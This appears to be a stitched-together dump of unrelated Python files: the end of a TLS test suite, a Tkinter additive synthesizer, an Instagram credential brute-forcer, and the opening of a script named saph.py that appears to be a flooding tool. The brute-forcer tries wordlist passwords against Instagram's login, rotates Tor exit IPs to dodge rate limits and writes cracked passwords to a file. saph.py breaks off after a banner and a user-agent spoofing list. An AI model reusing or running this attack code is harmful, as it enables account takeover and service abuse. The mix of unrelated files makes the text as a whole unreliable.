sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
instagram.py | # Date: 06/10/2017
# Distro: Kali linux
# Desc: Instagram Bruteforce
#
#
import os
import time
import urllib
import argparse
import threading
import subprocess
from platform import platform
from Core.tor import TorManager
from Core.Browser import Browser
class Instagram(TorManager,Browser):
def __init__(self,username,wordlist):
self.username = username
self.wordlist = wordlist
self.lock = threading.Lock()
self.ip = None
self.tries = 0
self.wait = False
self.alive = True
self.isFound = False
self.passlist = []
self.recentIps = []
#for browser
self.url = 'https://www.instagram.com/accounts/login/?force_classic_login'
self.form1 = 'username'
self.form2 = 'password'
Browser.__init__(self)
TorManager.__init__(self)
self.n = '\033[0m'
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
def kill(self,msg=None):
self.alive = False
self.stopTor()
try:
if self.isFound:
self.display(msg)
print (' [-] Password Found!')
with open('Cracked.txt','a') as f:
f.write('[-] Username: {}\n[-] Password: {}\n\n'.\
format(self.username,msg))
if all([not self.isFound, msg]):
print ('\n [-] {}'.format(msg))
finally:exit()
def modifylist(self):
if len(self.recentIps) == 5:
del self.recentIps[0]
# failsafe
if len(self.recentIps) > 5:
while all([len(self.recentIps) > 4]):
del self.recentIps[0]
def manageIps(self,rec=2):
ip = self.getIp()
if ip:
if ip in self.recentIps:
self.updateIp()
self.manageIps()
self.ip = ip
self.recentIps.append(ip)
else:
if rec:
self.updateIp()
self.manageIps(rec-1)
else:
self.connectionHandler()
def changeIp(self):
self.createBrowser()
self.updateIp()
self.manageIps()
self.modifylist()
self.deleteBrowser()
def setupPasswords(self):
with open(self.wordlist,'r') as passwords:
for pwd in passwords:
pwd = pwd.replace('\n','')
if len(self.passlist) < 5:
self.passlist.append(pwd)
else:
while all([self.alive,len(self.passlist)]):pass
if not len(self.passlist):
self.passlist.append(pwd)
# done reading files
while self.alive:
if not len(self.passlist):
self.alive = False
def connectionHandler(self):
if self.wait:return
self.wait = True
print (' [-] Waiting For Connection {}...{}'.format(self.g,self.n))
while all([self.alive,self.wait]):
try:
self.updateIp()
urllib.urlopen('https://wtfismyip.com/text')
self.wait = False
break
except IOError:
time.sleep(1.5)
self.manageIps()
def attempt(self,pwd):
with self.lock:
self.tries+=1
self.createBrowser()
html = self.login(pwd)
self.deleteBrowser()
if html:
if all([not self.form1 in html,not self.form2 in html]):
self.isFound = True
self.kill(pwd)
del self.passlist[self.passlist.index(pwd)]
def run(self):
self.display()
time.sleep(1.3)
threading.Thread(target=self.setupPasswords).start()
while self.alive:
bot = None
for pwd in self.passlist:
bot = threading.Thread(target=self.attempt,args=[pwd])
bot.start()
# wait for bot
if bot:
while all([self.alive,bot.is_alive()]):pass
if self.alive:
self.changeIp()
def display(self,pwd=None):
pwd = pwd if pwd else ''
ip = self.ip if self.ip else ''
creds = self.r if not self.isFound else self.g
attempts = self.tries if self.tries else ''
subprocess.call(['clear'])
print ('')
print (' +------- Instagram -------+')
print (' [-] Username: {}{}{}'.format(creds,self.username.title(),self.n))
print (' [-] Password: {}{}{}'.format(creds,pwd,self.n))
print (' [-] Proxy IP: {}{}{}'.format(self.b,ip,self.n))
print (' [-] Attempts: {}{}{}'.format(self.y,attempts,self.n))
print ('')
if not ip:
print (' [-] Obtaining Proxy IP {}...{}'.format(self.g,self.n))
self.changeIp()
time.sleep(1.3)
self.display()
def main():
# assign arugments
args = argparse.ArgumentParser()
args.add_argument('username',help='Email or username')
args.add_argument('wordlist',help='wordlist')
args = args.parse_args()
# assign variables
engine = Instagram(args.username,args.wordlist)
# does tor exists?
if not os.path.exists('/usr/bin/tor'):
try:engine,installTor()
except KeyboardInterrupt:engine.kill('Exiting {}...{}'.format(self.g,self.n))
if not os.path.exists('/usr/sbin/tor'):
engine.kill('Please Install Tor'.format(engine.y,engine.r,engine.n))
# does the account exists?
if not engine.exists(engine.username):
engine.kill('The Account \'{}\' does not exists'.format(engine.username.title()))
# start attack
try:
engine.run()
finally:
if not engine.isFound:
engine.kill('Exiting {}...{}'.format(engine.g,engine.n))
if __name__ == '__main__':
if not 'kali' in platform():
exit('Kali Linux required')
if os.getuid():
exit('root access required')
else:
main()
|
composer.py | #!/usr/bin/env python
"""
composer.py
--
Christopher Kuech
cjkuech@gmail.com
--
Requires:
Python 2.7, PyAudio
Instructions:
python composer.py [number-of-controllers]
"""
from array import array
from math import sin, pi
from pyaudio import PyAudio
import sys
from threading import Thread, Lock
import Tkinter as tk
class App(tk.Frame):
    """Top-level view: n oscillator Controllers plus a composite display row."""

    def __init__(self, root, n):
        # init view with scrollbar
        tk.Frame.__init__(self, root)
        self.canvas = tk.Canvas(root, borderwidth=0, background="#ffffff")
        self.frame = tk.Frame(self.canvas, background="#ffffff")
        self.vsb = tk.Scrollbar(root, orient="vertical", command=self.canvas.yview)
        self.canvas.configure(yscrollcommand=self.vsb.set)
        self.vsb.pack(side="right", fill="y")
        self.canvas.pack(side="left", fill="both", expand=True)
        # The inner frame lives inside the canvas so the whole UI can scroll.
        self.canvas.create_window((4,4), window=self.frame, anchor="nw", tags="self.frame")
        self.frame.bind("<Configure>", self.onconfigure)
        self.canvas["width"] = 810
        # One ~130px row per controller plus one row for the composite view.
        self.canvas["height"] = 130 * (n + 1)
        # init controllers
        self.controllers = [Controller(self, self.frame, i) for i in xrange(n)]
        # make combined wave view
        self.disp = DisplayView(self.frame)
        self.disp.grid(row=n, column=0)
        self.disp["bg"] = "#555"
        self.sound = Sound()
        # Compute the initial composite before starting audio playback.
        self.update()
        self.sound.play()

    def update(self):
        """Recompute the composite display image and audio period.

        Averages the per-controller pixel and sample data.
        NOTE(review): this shadows Tkinter's Frame.update(); presumably
        intentional since Controller.onupdate() calls it directly — confirm.
        """
        # create composite drawing
        imgdata = []
        for x in xrange(DisplayView.WIDTH):
            y = sum(c.disp.imgdata[x] for c in self.controllers) / len(self.controllers)
            imgdata.append(y)
        self.disp.setimgdata(imgdata)
        # create composite sound
        wavdata = []
        for t in xrange(int(Sound.FPS / Sound.F0)):
            # Samples are ints, so under Python 2 this is floor division;
            # assumed acceptable for averaging — TODO confirm.
            samp = sum(c.sound.wavdata[t] for c in self.controllers) / len(self.controllers)
            wavdata.append(samp)
        self.sound.setwavdata(wavdata)

    def onconfigure(self, event):
        """Reset the scroll region to encompass the inner frame"""
        self.canvas.configure(scrollregion=self.canvas.bbox("all"))
class Controller:
    """One oscillator: a waveform display, its sliders, and its Sound."""

    def __init__(self, parent, wrapper, i):
        self.parent = parent
        # Waveform display in column 0, slider panel in column 1 of row i.
        self.disp = DisplayView(wrapper)
        self.disp.grid(row=i, column=0)
        self.ctrl = ControlView(wrapper)
        self.ctrl.grid(row=i, column=1)
        self.sound = Sound()
        # Tk variables backing the frequency / amplitude / phase sliders.
        self.f = tk.IntVar()
        self.a = tk.DoubleVar()
        self.p = tk.DoubleVar()
        self.f.set(0)
        self.a.set(1)
        self.p.set(0)
        self.ctrl.bind(self)
        self._refresh()

    def _refresh(self):
        """Redraw the display and recompute the audio from slider values."""
        freq = self.f.get() + 1
        amp = self.a.get()
        phase = self.p.get()
        self.disp.plot(freq, amp, phase)
        self.sound.update(freq, amp, phase)

    def onupdate(self):
        """Slider callback: refresh this oscillator, then the composite."""
        self._refresh()
        self.parent.update()
class ControlView(tk.Frame):
    """Panel of three vertical sliders (frequency, amplitude, phase)."""

    def __init__(self, parent, **kwargs):
        tk.Frame.__init__(self, parent, **kwargs)
        # Shared look-and-feel options for all three Scale widgets.
        kwargs0 = {
            "activebackground": "#f99",
            "fg": "#333",
            "font": ("Helvetica-Neue Helvetica sans-serif", "18"),
            "bd": 1, # 3D border width
            "highlightthickness": 1, # focus thickness
            "length": 100, # currently default already
            "orient": tk.VERTICAL,
            "sliderrelief": tk.FLAT,
            "troughcolor": "#ddd",
        }
        # f: harmonic index 0..8, a: amplitude 0..1, p: phase 0..2*pi.
        self.fslide = tk.Scale(self, label="f", from_=0, to=8, resolution=1, **kwargs0)
        self.aslide = tk.Scale(self, label="a", from_=0.0, to=1, resolution=0.1, **kwargs0)
        self.pslide = tk.Scale(self, label="p", from_=0.0, to=2*pi, resolution=2*pi/24, **kwargs0)
        self.fslide.grid(row=0, column=0)
        self.aslide.grid(row=0, column=1)
        self.pslide.grid(row=0, column=2)

    def bind(self, ctrl):
        """Attach the sliders to the controller's Tk variables and callback.

        NOTE(review): shadows the Tk widget bind(); only ever called here
        with a Controller argument — confirm no Tk event binding is needed.
        """
        for (w, v) in ((self.fslide, ctrl.f), (self.aslide, ctrl.a), (self.pslide, ctrl.p)):
            w["variable"] = v
            w["command"] = lambda _: ctrl.onupdate()
class DisplayView(tk.Canvas):
    """Canvas that renders one waveform as red pixels on a PhotoImage."""

    WIDTH = 600   # plot width in pixels; also the length of imgdata
    HEIGHT = 120  # plot height in pixels

    def __init__(self, parent):
        tk.Canvas.__init__(self, parent, width=DisplayView.WIDTH, height=DisplayView.HEIGHT, bg="#333")
        # Last y value plotted per x column; read by App.update() to composite.
        self.imgdata = [0 for x in xrange(DisplayView.WIDTH)]

    def clear(self):
        """Replace the image with a fresh blank PhotoImage."""
        self.img = tk.PhotoImage(width=DisplayView.WIDTH, height=DisplayView.HEIGHT)

    def drawaxis(self):
        """Draw the horizontal zero axis across the middle of the image."""
        for x in xrange(DisplayView.WIDTH):
            self.img.put("#999", (x, DisplayView.HEIGHT // 2))

    def show(self):
        """Blit the PhotoImage centered on the canvas."""
        self.create_image((round(DisplayView.WIDTH / 2), round(DisplayView.HEIGHT / 2)), image=self.img)

    def plot(self, f, a, p):
        """Plot a * sin(2*pi*f*x - p) across the canvas width.

        f is rescaled to cycles-per-pixel and a to pixel amplitude
        (95% of half the canvas height).
        """
        self.clear()
        self.drawaxis()
        (f, a, p) = (float(f) / DisplayView.WIDTH, a * DisplayView.HEIGHT / 2 * 0.95, p)
        for x in xrange(DisplayView.WIDTH):
            y = a * sin(2 * pi * x * f - p)
            self.setpx(x, y)
        self.show()

    def setimgdata(self, data):
        """Redraw the plot from a precomputed list of y values (one per x)."""
        self.clear()
        self.drawaxis()
        for (x, y) in enumerate(data):
            self.setpx(x, y)
        self.show()

    def setpx(self, x, y):
        """Record y for column x and paint the corresponding pixel red.

        Pixel coordinates are clamped to the image bounds; the +2/+5
        offsets are presumably visual fudge factors — TODO confirm.
        """
        mid = round(DisplayView.HEIGHT / 2)
        (i, j) = (min(max(mid - y + 2, 0), DisplayView.HEIGHT), min(max(x + 5, 0), DisplayView.WIDTH))
        self.imgdata[x] = y
        self.img.put("#F00", (int(j), int(i)))
class Sound:
    """One period of a synth voice, looped forever on a PyAudio stream."""

    # F0 = 16.35 # C0
    F0 = 110.0 # A2 fundamental frequency in Hz
    FPS = 44100  # sample rate (frames per second)

    def __init__(self):
        # One period of signed 16-bit samples at the fundamental frequency.
        self.wavdata = array('h', [0 for i in xrange(int(Sound.FPS / Sound.F0))])
        self.lock = Lock()

    def play(self):
        """Start a daemon thread that writes the current period in a loop."""
        def worker():
            p = PyAudio()
            stream = p.open(format=p.get_format_from_width(2),
                channels=1, rate=44100, output=True)
            while True:
                # Hold the lock during the write so setwavdata() cannot
                # swap samples mid-buffer.
                self.lock.acquire()
                stream.write(self.wavdata.tostring())
                self.lock.release()
        t = Thread(target=worker)
        t.setDaemon(True)
        t.start()

    def update(self, f, a, p):
        """Fill the period with a * sin(2*pi*f*t - p) at harmonic 2**f.

        NOTE(review): writes wavdata WITHOUT taking self.lock, unlike
        setwavdata() — racy against the playback thread; confirm whether
        an occasional audio glitch is acceptable here.
        """
        # Convert harmonic index to cycles per sample and a to 16-bit scale.
        f = Sound.F0 * 2**f / Sound.FPS
        a = (2**15 - 1) * a
        for t in xrange(int(Sound.FPS / Sound.F0)):
            samp = a * sin(2 * pi * t * f - p)
            self.wavdata[t] = Sound.truncate(samp)

    def setwavdata(self, wavdata):
        """Atomically replace the period with the given samples."""
        self.lock.acquire()
        for (i, samp) in enumerate(wavdata):
            self.wavdata[i] = Sound.truncate(samp)
        self.lock.release()

    @staticmethod
    def truncate(samp):
        """Clamp a sample into the signed 16-bit range and cast to int."""
        return int(max(min(samp, 2**15 - 1), -2**15))
if __name__ == "__main__":
    # Controller count comes from argv, defaulting to 3.
    if len(sys.argv) == 2:
        count = int(sys.argv[1])
    else:
        count = 3
    root = tk.Tk()
    root.wm_title("Additive Synthesizer")
    App(root, count).pack(side="top", fill="both", expand=True)
    root.mainloop()
# eof
|
saph.py | import os
import sys
import threading
import socket
import time as t
import colorama
from colorama import init
from colorama import Fore
import datetime
from datetime import datetime
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random
banner = """
,-.
( O_)
/ `-/
/-. /
/ )
/ /
_ /-. /
(_)*-._ / )
*-._ *-'**( )/
*-/*-._* `.
/ *-.'._
/\ /-._*-._
_,---...__ / ) _,-*/ *-(_)
___<__(|) _ **-/ / / /
' `----' **-. \/ / /
) ] / /
____..-' // / )
,-** __.,'/ / ___ /,
/ ,--**/ / / /,-** ***-. ,'/
[ ( / / / / ,.---,_ `._ _,-','
\ `-./ / / / / `-._ *** ,-'
`-._ / / / /_,' **--*
*/ / / /*
/ / / /
/ / / /
/ |,' /
: / /
[ / ,'
| / ,'
|/,-'
'
"""
print(banner)
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
